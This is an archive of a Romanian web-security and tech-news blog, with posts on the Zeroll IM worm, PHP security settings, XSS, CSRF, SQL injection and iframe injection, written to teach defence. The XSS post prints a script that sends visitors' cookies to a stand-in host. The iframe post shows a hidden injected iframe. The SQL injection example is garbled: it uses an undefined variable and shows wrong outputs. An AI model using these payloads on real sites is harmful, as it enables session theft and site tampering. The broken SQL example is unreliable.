Web Bunch - Diverse articole despre securitate, vulnerabilitati PHP, MySql

Google Joomla! Drupal..

2010-12-21T23:13:00.002+02:00

crimp PIN tradus de Google

2010-09-21T17:08:00.001+03:00

Romana -> Engleza
crimp PIN = creţ PIN

Is it wrong google ?

2010-09-06T13:03:00.002+03:00

Utilizatorii de Yahoo! Messenger şi Google Talk, ameninţaţi de un nou vierme

2010-08-31T14:00:00.000+03:00

Kaspersky Lab a identificat o nouă tipologie (familie) de viermi care se răspândesc prin intermediul unor numeroase programe de tip mesagerie instant (IM) şi transmit text în foarte multe limbi.

Experţii Kaspersky Lab au descoperit până acum patru versiuni ale acestui vierme, a cărui familie a fost denumită IM-Worm.Win32.Zeroll. Aceştia sunt neobişnuiţi prin faptul că transmit text în foarte multe limbi şi se propagă simultan prin clienţi de IM, precum Yahoo! Messenger, Skype, ICQ, Windows Live Messenger, Paltalk Messenger, Google Talk şi XFire, special folosit de cei care se joacă online.

Imediat ce pătrunde în computer, acesta caută lista de contacte din programul IM şi se autotransmite către toate adresele pe care le găseşte. Infecţia se produce în momentul în care utilizatorul accesează un link dintr-un mesaj instant primit, despre care crede că îi va afişa o fotografie interesantă. În locul fotografiei, utilizatorul este direcţionat către un fişier infectat care se descarcă automat în sistem.

Cele mai mult infecţii au fost înregistrate în Mexic

Capacitatea de a trimite mesaje compuse în multe limbi diferenţiază aceşti viermi de majoritatea celor transmişi prin IM. IM-Worm.Win32.Zeroll foloseşte 13 limbi diferite, inclusiv engleza, germana, spaniola şi portugheza, lansând mesaje pe care utilizatorii din aceste ţări le înţeleg. La momentul de faţă, cele mai multe infecţii s-au înregistrat în Mexic, Brazilia, Peru şi Statele Unite ale Americii, dar au fost identificate cazuri şi în Africa, India sau ţările europene, cu preponderenţă în Spania.

IM-Worm.Win32.Zeroll are şi funcţionalitate de backdoor, adică poate prelua controlul asupra unui computer, fără ca utilizatorul să ştie acest lucru. După ce intră în sistem, viermele contactează un centru (server) de comandă şi control, iar după ce primeşte comenzile prin IRC începe să descarce în sistem alte programe periculoase. Interesant este faptul că acest vierme se conectează la diferite canale IRC, în funcţie de ţară şi de programul de mesagerie instant existent pe computerul infectat. Acest lucru este avantajos pentru hackeri, deoarece pot controla şi clasifica sistemele infectate în funcţie de ţară şi de clientul de mesagerie instant folosit, permiţând apoi trasmiterea de comenzi personalizate, utile atunci când se lansează mesaje spam care ţintesc un anumit public.

„Se pare că infractorii cibernetici care au creat acest vierme sunt încă la început”, spune Dmitry Bestuzhev, Regional Expert Kaspersky Lab Latin America. „Aceştia caută să infecteze cât mai multe computere pentru a obţine oferte din partea altor reţele de infractori care doresc să le folosească pentru activităţi ca pay-per-install, spam şi multe altele”, încheie acesta.

Toţi utilizatorii produselor de securitate Kaspersky Lab sunt protejaţi împotriva noilor viermi care se propagă prin intermediul programelor de mesagerie instant.

SURSA: Kaspersky

Google a adunat „din greşeală“ date personale ale utilizatorilor români de WiFi

2010-05-20T12:04:00.002+03:00

Google a admis că maşinile utilizate pentru serviciul de cartografiere Street View au colectat din greşeală date personale trimise de utilizatori ai unor reţele wiveless fidelity nesecurizate, scrie AFP, citată de HotNews.ro. România este pe lista celor 30 de ţări unde maşinile companiei au colectat date pentru Street View, iar Google şi-a cerut scuze şi spune că de acum va avea grijă ca astfel de date să nu mai fie înregistrate. E posibil ca Google să fi colectat informaţii legate de e-mail-uri, dar şi de site-urile vizitate de unii utilizatori.

Scandalul a izbucnit în Germania, unde autorităţile au cerut un audit pentru datele ce sunt colectate de maşinile care fac poze pentru serviciul Street View, ce oferă imagini panoramice 360 de grade la nivel de stradă. Nu se ştie exact ce date confidenţiale au fost strânse de maşinile Street View, însă se pare că este vorba de unele e-mail-uri, fotografii, dar posibil şi date despre ce site-uri au vizitat unii utilizatori.

Google vrea să liniştească opinia publică şi a ţinut să precizeze că nu a colectat decât 600 GB de date personale, cam cât un hard-disk standard. Compania spune că va avea grijă ca datele colectate în fiecare ţară să fie şterse şi asigură publicul că nicio informaţie colectată nu a fost folosită la vreun produs Google. Compania a mai adăugat că datele personale colectate reprezintă doar frânturi de comunicare deoarece maşinile se aflau în mers, reţelele WiFi de la care erau strânse informaţii schimbându-se des.

Sugerati o traducere mai buna?..

2010-03-19T16:51:00.003+02:00

Google Translate rescrie alfabetul! De-asta nu traduce 100% corect. Foloseste alt alfabet!!

EVZ.ro server limits?..

2010-01-11T13:14:00.004+02:00

Sunt curios daca a fost vreun articol care a dus la caderea serverului MySQL evz.ro astazi 11.01.2010. Cate "megalioane" de cereri MySQL sa fi dus la asta?
Oricum .. am o presimtire ca folosesc o tabela "settings".

Probass cumparat de o companie poloneza

2009-12-15T09:34:00.002+02:00

Compania poloneza IT Asseco South Eastern Europe (SEE) a achizitionat integral furnizorul roman de solutii IT Professional Bank Systems & Software (Probass), dupa ce a platit 7,7 milioane de euro pentru 60% din capitalul firmei si a preluat restul actiunilor printr-un schimb de titluri. Compania poloneza, care a mai preluat in 2007 firmele locale Fiba Software si Net Consulting, anuntase in urma cu o luna ca are aproape 30 mil. euro pentru achizitii si ca studiaza oportunitatile din Romania.

"Ne uitam la firme cu afaceri repetitive, care au expertiza si ai caror manageri nu vor sa plece din companie odata cu vanzarea.

Site:www.probass.ro/

Tvr.ro Hacked !!

2009-11-12T17:19:00.003+02:00

La cate investitii guvernamentale s-au facut in site ul asta, se pare ca are si "mici" vulnerabilitati.
La un moment dat intrand pe tvr.ro dau de :

Viitorul banilor cu PayPal

2009-10-02T06:08:00.003+03:00

Imagineaza-ti! Sa poti cumpara seminte sau sa dai bani la lautari cu PayPal!

Kasperski si Gecad la conferinta in Bucuresti

2009-09-22T15:14:00.003+03:00

Conferinta de conferinta, lume buna, mai tot stafful de la Gecad, jurnalisti,
atmosfera prietenoasa ce sa mai..
Securitatea globala a fost tema principala si nu prea s-au abatut de la subiect.

Ideile lui Eugene Karsperski se invart in jurul centralizarii securitatii si mai ales a implicarii guvernamentale in criminalitatea cibernetica. Evident, discursuri utopice despre ce se va intampla in 10 ani poate, acum sugerand cu tenta umoristica :
"Buy more antivirus software " :D

Scopul unui Interpol al Internetului ar fi diminuarea ratei de criminalitate si nu de a o elimina complet pentru ca nici nu crede ca s-ar putea eradica de tot.

O identificare mai clara a utilizatorului de internet poate fi una din solutiile
gasirii potentialilor rau-facatori "virtuali" deoarece, cum a si zis, datele userului de internet nu contin nimic despre tara in care se afla si politiile nationale nu pot coopera intre ele.

De asemenea, a sustinut si faptul ca a nu fi in calitatea de victima software sau de orice fel implica si atentia persoanei in cauza fapt pe care securitatea externa nu il poate garanta si nici anticipa. Exemplu lui a fost ca daca stai continuu pe site uri cu continut pornografic si abia intr-una din dati ai fost infectat cu vreun virus informatic ... atunci..nu Kasperski e de vina cu alte cuvinte.

Intrebat de colegul meu despre ce efect va avea aceasta orientare asupra softurilor open source, GPL , free in orice caz, a raspuns diplomatic ca aceasta n-ar fi o masura de culoare economica si nu crede ca va avea un efect negativ, afirmand ca ii place Unix ul in general.
(ba chiar tinand un moment in discurs despre Securitate vs Flexibilitate si MS Windows a fost unu din exemplele de .. flexibilitate )

Oracle a lansat cel mai rapid server din lume

2009-09-17T13:09:00.001+03:00

Compania Oracle a lansat Exadata Version 2, este cel mai rapid server din lume atât pentru stocare de date, cât şi pentru procesare de tranzacţii online (OLTP - online transaction processing).

Exadata Database Machine Version 2, a fost creat de de Sun şi Oracle utilizând componente hardware standard din domeniu, la care se adaugă tehnologia FlashFire de la Sun, Oracle Database 11g Release 2 şi Oracle Exadata Storage Server Software Release 11.2.

Exadata Version 2 este disponibilă în patru modele: rack complet (8 servere de baze de date şi 14 servere de stocare), semi-rack (4 servere de baze de date şi 7 servere de stocare), sfert de rack (2 servere de baze de date şi 3 servere de stocare) şi un sistem de bază (1 server de baze de date şi 1 server de stocare).

Cu Database Machine de la Sun şi Oracle, clienţii Oracle pot stoca o cantitate de date de peste zece ori mai mare şi pot căuta datele de peste zece ori mai rapid fără a efectua vreo modificare la aplicaţii.

„Exadata V2 rulează virtual toate aplicaţiile de baze de date mult mai rapid şi mai puţin costisitor decât orice alt computer din lume”, potrivit lui Larry Ellison, CEO Oracle.

Cross-site request forgery

2009-09-02T13:59:00.002+03:00

Cerere Cross-site falsa cunoscuta, de asemenea, ca un atac click şi abreviată ca CSRF ( "Sea-surf" ) sau XSRF, este un tip de malware, de a exploata un site web prin care comenzi neautorizate sunt transmise de la un utilizator. Spre deosebire de cross-site scripting (XSS), care exploatează "increderea" pe care un utilizator are pentru un anumit site, CSRF exploateaza "increderea" pe care un site are în browser-ul unui utilizator.

Amazon, Microsoft şi Yahoo s-au unit împotriva gigantului Google

2009-08-27T10:27:00.001+03:00

Amazon, Microsoft şi Yahoo au creat o coaliţie numită "Open Book Alliance" (Alianţa cărţilor cu acces liber) în încercarea de a opri planurile companiei Google, care intenţionează să creeze cea mai mare bibliotecă virtuală din lume, informează presa de specialitate, citată de NewsIn.

Cei trei giganţi, cărora li s-au alăturat biblioteci şi asociaţii de editori din SUA şi Europa, se opun unei înţelegeri amiabile care ar putea face din Google sursa principală de cărţi scanate. "Google încearcă să monopolizeze sistemul bibliotecilor digitale. Dacă înţelegerea va funcţiona, vor da lovitura", a declarat Brewster Kahle, fondatorul Archivei de pe Internet.

Totul a pornit în 2008, când compania care a creat imensul motor de căutare a ajuns la o înţelegere cu editorii şi autorii în privinţa a două procese care acuzau compania de încălcarea drepturilor de autor pentru scanarea neautorizată a cărţilor. În această înţelegere, Google a fost de acord să plătească 125 milioane de dolari pentru a crea un Registru al Drepturilor Cărţii, în care autorii şi editorii îşi pot înregistra operele, urmând să primească 70% din vânzarea lor, companiei Google revenindu-i 30% din câştiguri.

Google ar fi primit şi dreptul de a digitaliza cărţi cărora nu li se cunoaşte autorul. Volumele de acest tip, pentru care nu poate pretinde nimeni drepturi de autor, se estimează că reprezintă 50-70% dintre cărţile publicate după 1923. Înţelegerea Google cu editorii şi autorii ar trebui să trebui să fie parafată până pe 4 septembrie.

Arhiva pentru Internet scanează 1.000 cărţi zilnic, la preţul de 30 cenţi pagina. Această formaţiune non-profit s-a opus, de multă vreme, acestei înţelegeri dintre Google, editori şi autori. Avocatul alianţei nou-create este Gary Reback, cel care a convins Departamentul de Justiţie din SUA să demareze o anchetă asupra practicilor non-concurenţiale ale Microsoft, în anii 90.

Conform datelor furnizate de compania de cercetare ComScore Inc, Google domina în iunie aproximativ 65% din piaţa motoarelor de căutare. Împreună, Microsoft şi Yahoo acopereau 28%.

Gigantul informaţional Microsoft a raportat în luna iulie scăderea cu 29% a profitului net înregistrat în al patrulea trimestru fiscal, la 3,05 miliarde dolari, sau 34 cenţi pe acţiune. La rândul său, Yahoo! Inc., deţinătorul celui de-al doilea cel mai popular motor de căutare, a anunţat un profit net în creştere la 141,4 milioane dolari pentru al doilea trimestru, dar a estimat că vânzările vor scădea în trimestrul următor, din cauza reducerii bugetelor pentru publicitate.

Javascript si artimetica

2009-07-20T16:59:00.003+03:00

Incearca de curiozitate urmatoarea linie:

alert(1.1+0.1);

Veti primi deloc suprinzatorul si mult asteptatul rezultat 1.2000000000000002.
O solutie explicabila din punct de vedere matematica dar comoda ca scarpinatul cu dreapta la urechea stanga ar fi sa inmultesti valorile adunate cu 1000000 si sa imparti rezultatul la 1000000.
Problema evident este a reprezentarii float ului si modul de lucru a Js ului cu acesta.

Iframe attack

2009-06-18T10:42:00.006+03:00

Se poate intampla ca toate paginile unui site au un iframe suspect cu sursa spre un site si mai suspect adaugat la final.
Este o forma de creare trafic la site uri de genul "pirateresc" (scuzati necuvantul) dat fiind ca fiecare incarcare a paginii tale ii aduce o vizita si hackerului cu pricina.
Aceasta e realizabila datorita unor exploituri care profita in general de drepturi scriere pe fisiere php (777 e prea generos) iar frameworkurile populare sunt principal vizate pentru ca sunt arhicunoscute directoarele, fisierele de configurare, etc.
Majoritatea CMS urilor au un index.php in care se afiseaza tot.Daca index.php ar arata:

include("header.php");
SiteContent::showEverything();
include("footer.php");

atunci o simpla injectare de forma urmatoare e suficienta sa apara iframe ul respectiv pe toate paginile site ului care trec prin index.php:

include("header.php");
SiteContent::showEverything();
include("footer.php");
echo '<iframe src="http://www.webbunch.blogspot.com" height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>';

Fixingul se poate face manual cu find and replace pentru ca practic se poate injecta html ul cu iframe-ul respectiv in orice php posibil.

spargere online - eMag hacked ..

2009-06-15T14:19:00.003+03:00

Cu tot soborul de coderi de la emag , au scapat vulnerabilitati descoperite
de http://www.alienhackers.com
Nu e nimic grav, doar SQL Injection cu care se poate obtine "mici detalii" despre
utilizatori.
http://www.alienhackers.com/emag-hacked/?content=ro.
Site ul DOMO in schimb este ceva mai vulnerabil, datele bancare fiind cam la indemana.
Parametrii se pare ca nu sunt sanitizati citand tot http://www.alienhackers.com.

Se mai intampla ce sa i faci. Totusi recomand un card cu bani limitati doar pentru diverse tranzactii de genul asta. Nu recomand sa faceti shopping cu cardu pe care sunt toate economiile dvs.
Nu prea ramburseaza bani astia de prin Rusia si China

$_REQUEST vs $_POST

2009-06-04T11:23:00.003+03:00

Globalul $_REQUEST contine: $_COOKIE, $_GET, si $_POST la un loc si astfel

daca folosesti $_REQUEST nu ai nici o garantie ca informatia venita este din post, ceea ce duce la gauri inerente de securitate.

De asemenea, daca $_GET['ex'] = 'valoare'; si $_POST['ex'] = 'alta valoare'; $_REQUEST['ex'] ar fi ultima setata.

Site-ul RATB a fost atacat de către hackeri - VEZI FOTO Site-ul RATB a fost atacat de către hackeri

2009-06-01T16:32:00.004+03:00

Site-ul de prezentare a Regiei Autonome de Transport Bucureşti a fost atacat de către hackeri. Situaţia a fost însă remediată după câteva ore.

Niciuna dintre paginile siteului RATB nu mai afişau informaţiile postate de către Regia Autonomă de Transport Bucureşti.

Pe fiecare pagină accesată în site-ul RATB apărea însă un singur mesaj: "Hacked by Hack EliTE".

Conducerea Regiei Autonome de Transport Bucureşti a declarat pentru REALITATEA.NET că nu ştie ce s-a întâmplat cu pagina de Internet a RATB. Directorul RATB, Aron Gheorghe, spune că "au mai fost ceva probleme în urma cu o lună", însă acum nu ştie ce s-a întâmplat.

Şeful biroului de presă al RATB, Mihai Vlădăroiu, a declarat pentru REALITATEA.NET că situaţia a fost remediată şi că echipa de specialişti IT au încărcat o bază de date salvată în urmă cu 10 zile. "Singurele informaţii care nu apar pe site în acest moment sunt ştirile de ultimă oră, însă această problemă va fi remediată luni", a adăugat şeful biroului de presă al RATB, Mihai Vlădăroiu.

Securitatea prin obscuritate

2009-05-26T10:33:00.003+03:00

În general, securitatea prin obscuritate este una dintre cele mai slabe forme de securitate. Dar în unele cazuri se doreşte orice sporire, cât de mică a securităţii.

Câteva tehnici simple pot ajuta la ascunderea PHP, posibil încetinind un atacator care încearcă să descopere puncte slabe în sistemul dumneavoastră. Stabilind expose_php = off în fişierul php.ini, puteţi reduce cantitatea de informaţii trimisă de server.

O altă tactică este configurarea serverelor web, cum ar fi Apache să prelucreze şi să interpreteze diferite tipuri de fişiere cu PHP, fie printr-o directivă .htaccess, fie direct în configuraţia Apache. Apoi puteţi utiliza extensii de fişiere, care să inducă în eroare:

# Face codul PHP să arate ca alte limbaje de programare web
AddType application/x-httpd-php .asp .py .pl

# Face codul PHP să arate ca HTML
AddType application/x-httpd-php .htm .html

Vulnerabilitati Cross Site Scripting (XSS)

2009-05-14T14:51:00.003+03:00

Vulnerabilitatile Cross site scripting, sau XSS
sunt acele scripturi introduse de un utilizator in valori data si afisate (evident si executate) unui alt utilizator.
De exemple daca intr-o pagina de editare profil este permisa introducerea in descriere a expresiilor javascript inclusiv taguri <script> acestea rezultatul afisarii publice lor poate fi folosit in scopuri mailicioase de unii utilizatori.

De exemplu un utilizator poate astfel colecta informatiile din cookie al altui utilizator prin un astfel de script:
<script>
document.location =
'http://www.hack-is-good.com/getcookie.php?' +
document.cookie;
</script>

Pentru a preveni astfel de atacuri puteti filtra (escapa) datele cerute de la utilizator. Caracterele HTML < si > trebuiesc inlocuite cu (< si>).
In PHP htmlspecialchars face treaba asta.

Daca totusi aveti nevoie de date HTML si filtrarea HTML ului nu este posibila este
suficient sa scoateti tagurile <script> din valoarea introdusa.

Ce este register_globals ?

2009-05-08T12:21:00.004+03:00

O problema frecventa de securitate in PHP este register_globals din php.ini.
Aceasta ( cu valori On sau Off) spune
sa inregistreze sau nu array-urile EGPCS (Environment, GET, POST, Cookie, Server) ca variabile globale.

Exemplu:

register_globals=on

Url ul http://www.test.ro/test.php?hacked=10 va declara by default $hacked ca variabila globala.

$DOCUMENT_ROOT va fi de asemenea definit (ca element din $_SERVER .. )

Register Global activat e echivalent cu initializarile:

$hacked = $_GET['hacked'];
$DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT'];

Evident aceasta poate fi o vulnerabilitate.
Ex:

register_globals=on

if( isset($_POST["pass_to_delete"]) && $_POST["pass_to_delete"]!="" ){
$delete = 1;
}
// ...

if($delete){
// sterge fisierele utilizatorului autentificat mai sus..
}

Un apel al URL ului cu delete=1 in $_GET duce la initializarea lui $delete = 1 fara a fi nevoie
de parola in $_POST si astfel poate sterge neautorizat.

Cel mai bine pentru securitate este sa lasati register_globals = off.
O programare buna implica initializarea manuala a variabilelor.

Ex:

$delete = 0;
if( isset($_POST["pass_to_delete"]) && $_POST["pass_to_delete"]!="" ){
$delete = 1;
}

Exemplu de SQL Injection

2009-05-06T22:23:00.002+03:00

Exemplu de cod pentru logarea unui utilizator:

$name = "sorin";
$query = "SELECT * FROM user_table WHERE username = '$name'";

// SQL Injecton
// Daca in formularul de logare numele introdus este urmatorul
$name_injected = "' OR 1'"

// In modul neprotejat:

$query_injected = "SELECT * FROM user_table WHERE username = '$name_bad'";
Query ul va arata:
SELECT * FROM user_table WHERE username = '' OR 1''

Ceea ce va duce la o tentativa de logare incorecta.

mysql_real_escape_string()
Aceasta este solutia SQL pentru a "escapa"
Concret adauga slash uri la valorile "escapate"

$name_escaped = mysql_real_escape_string($name_bad);
$query_escaped = "SELECT * FROM user_table WHERE username = '$name_escaped'";
va arata:
SELECT * FROM user_table WHERE username = \'\' OR 1\'\'

WEB Rullz!

2009-05-06T15:47:00.002+03:00

No need to argue with that..
A developer who once in his life did some
programming in other platform then web probably feels the same.

We're a bunch!

2009-05-06T15:39:00.000+03:00

WebBunch is launched!

You can find various articles on PHP MySql web development,
CMS s news, tutorials or HTML / CSS Javascript tricks.